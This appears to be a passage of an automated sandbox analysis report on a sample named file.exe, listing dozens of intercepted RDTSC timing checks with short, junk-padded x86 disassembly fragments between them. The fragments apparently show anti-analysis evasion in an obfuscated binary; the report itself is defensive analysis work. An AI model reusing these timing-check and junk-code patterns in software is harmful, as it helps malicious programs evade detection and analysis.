                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE64A second address: ABE653 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE238 second address: ABE251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE3AA second address: ABE3B4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1B751F19DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE3B4 second address: ABE3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC109C second address: AC10CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1B751F19DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1B751F19E9h 0x00000012 jc 00007F1B751F19D6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC10CD second address: AC10DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F1B74BBC1C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0AE2 second address: AC0AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB7E9 second address: ACB7FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD088D second address: AD08B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1B751F19E5h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD08B0 second address: AD08B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7272 second address: AD729A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F1B751F19DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD729A second address: AD729E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD729E second address: AD72A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD72A4 second address: AD72B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1B74BBC1D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7401 second address: AD7409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF78C second address: ADF799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F1B74BBC1CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF799 second address: ADF7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E8h 0x00000009 jmp 00007F1B751F19E0h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 jmp 00007F1B751F19E1h 0x00000016 jnl 00007F1B751F19D6h 0x0000001c pop eax 0x0000001d pushad 0x0000001e jo 00007F1B751F19D6h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 pushad 0x00000028 jo 00007F1B751F19D6h 0x0000002e push edi 0x0000002f pop edi 0x00000030 push edi 0x00000031 pop edi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE15F second address: AFE163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE163 second address: AFE16B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDC94 second address: AFDCA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDCA3 second address: AFDCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDCA9 second address: AFDCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDCB1 second address: AFDD01 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1B751F19D6h 0x00000008 jbe 00007F1B751F19D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jp 00007F1B751F19E9h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jl 00007F1B751F19DAh 0x0000001f pushad 0x00000020 jmp 00007F1B751F19E7h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17C6D second address: B17C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1B74BBC1CBh 0x00000008 jmp 00007F1B74BBC1D3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16B6B second address: B16B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19DEh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jnc 00007F1B751F19DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16CF9 second address: B16D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1B74BBC1C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16D03 second address: B16D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16F84 second address: B16F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16F88 second address: B16F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17115 second address: B17130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17130 second address: B17136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17136 second address: B1713C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1713C second address: B17140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B176B9 second address: B176CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F1B74BBC1C8h 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B176CB second address: B176DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F1B751F19D6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17856 second address: B1787E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F1B74BBC1D5h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BDD6 second address: B1BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BDDA second address: B1BE3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F1B74BBC1C8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000004h 0x00000024 jmp 00007F1B74BBC1CDh 0x00000029 call 00007F1B74BBC1C9h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1B74BBC1D9h 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE3A second address: B1BE59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F1B751F19E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE59 second address: B1BE5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE5D second address: B1BE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007F1B751F19D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1BE71 second address: B1BE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1B74BBC1CAh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F54A second address: B1F568 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1B751F19D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push ecx 0x00000012 jnp 00007F1B751F19D6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F568 second address: B1F56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070CBC second address: 5070CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070CC2 second address: 5070CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1CBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070CD1 second address: 5070D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1B751F19DDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070D00 second address: 5070D67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov dh, DFh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e mov dx, ax 0x00000011 pop eax 0x00000012 mov ax, bx 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F1B74BBC1D5h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ebx, 52FA796Eh 0x00000026 pushfd 0x00000027 jmp 00007F1B74BBC1CFh 0x0000002c or esi, 002E1A1Eh 0x00000032 jmp 00007F1B74BBC1D9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070D67 second address: 5070DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F1B751F19E3h 0x0000000c sub cx, 442Eh 0x00000011 jmp 00007F1B751F19E9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070DAA second address: 5070DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070DAE second address: 5070DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060C5A second address: 5060C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060C60 second address: 5060CD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F1B751F19E4h 0x00000012 pushfd 0x00000013 jmp 00007F1B751F19E2h 0x00000018 add al, 00000008h 0x0000001b jmp 00007F1B751F19DBh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F1B751F19E9h 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edx, ax 0x0000002f mov cx, F57Bh 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060CD0 second address: 5060D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0DF70F62h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 pushfd 0x00000011 jmp 00007F1B74BBC1CEh 0x00000016 and eax, 20D059F8h 0x0000001c jmp 00007F1B74BBC1CBh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, 58EC4FE6h 0x0000002c pushfd 0x0000002d jmp 00007F1B74BBC1D7h 0x00000032 and ax, CA6Eh 0x00000037 jmp 00007F1B74BBC1D9h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0772 second address: 50A0776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0776 second address: 50A077A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50400B3 second address: 5040154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1B751F19DCh 0x00000011 or cx, A998h 0x00000016 jmp 00007F1B751F19DBh 0x0000001b popfd 0x0000001c mov si, 534Fh 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F1B751F19E5h 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F1B751F19DEh 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F1B751F19DEh 0x00000036 or cx, AE58h 0x0000003b jmp 00007F1B751F19DBh 0x00000040 popfd 0x00000041 movzx ecx, di 0x00000044 popad 0x00000045 push dword ptr [ebp+04h] 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F1B751F19DEh 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060536 second address: 506053C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506053C second address: 506059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1B751F19E0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ch, dl 0x00000013 pushfd 0x00000014 jmp 00007F1B751F19DAh 0x00000019 add si, BD98h 0x0000001e jmp 00007F1B751F19DBh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1B751F19E5h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506059E second address: 50605A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50605A4 second address: 50605A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50605A8 second address: 50605C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B74BBC1D2h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50605C6 second address: 50605ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B751F19E5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060482 second address: 50604AA instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a call 00007F1B74BBC1CEh 0x0000000f mov edi, eax 0x00000011 pop ecx 0x00000012 mov si, dx 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604AA second address: 50604AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604AE second address: 50604B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604B2 second address: 50604B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604B8 second address: 50604D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1D8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604D4 second address: 50604D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50604D8 second address: 5060500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F1B74BBC1D7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060500 second address: 5060504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060504 second address: 5060508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060508 second address: 506050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506021D second address: 5060222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060222 second address: 5060230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B751F19DAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060230 second address: 506025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop edx 0x00000013 mov ch, 63h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1B74BBC1CBh 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B8B second address: 5040BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1B74BBC1D1h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F1B74BBC1CEh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BC3 second address: 5040BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1B751F19E3h 0x0000000a adc eax, 09420CAEh 0x00000010 jmp 00007F1B751F19E9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BFC second address: 5040CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1B74BBC1CDh 0x00000012 sbb al, FFFFFF96h 0x00000015 jmp 00007F1B74BBC1D1h 0x0000001a popfd 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F1B74BBC1CDh 0x00000025 add eax, 276F2CF6h 0x0000002b jmp 00007F1B74BBC1D1h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F1B74BBC1CEh 0x00000038 push dword ptr [ebp+14h] 0x0000003b pushad 0x0000003c push esi 0x0000003d pushfd 0x0000003e jmp 00007F1B74BBC1CDh 0x00000043 xor al, 00000006h 0x00000046 jmp 00007F1B74BBC1D1h 0x0000004b popfd 0x0000004c pop eax 0x0000004d mov ecx, edx 0x0000004f popad 0x00000050 push dword ptr [ebp+10h] 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F1B74BBC1D6h 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040CE3 second address: 5040CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040CFF second address: 5040D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D03 second address: 5040D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
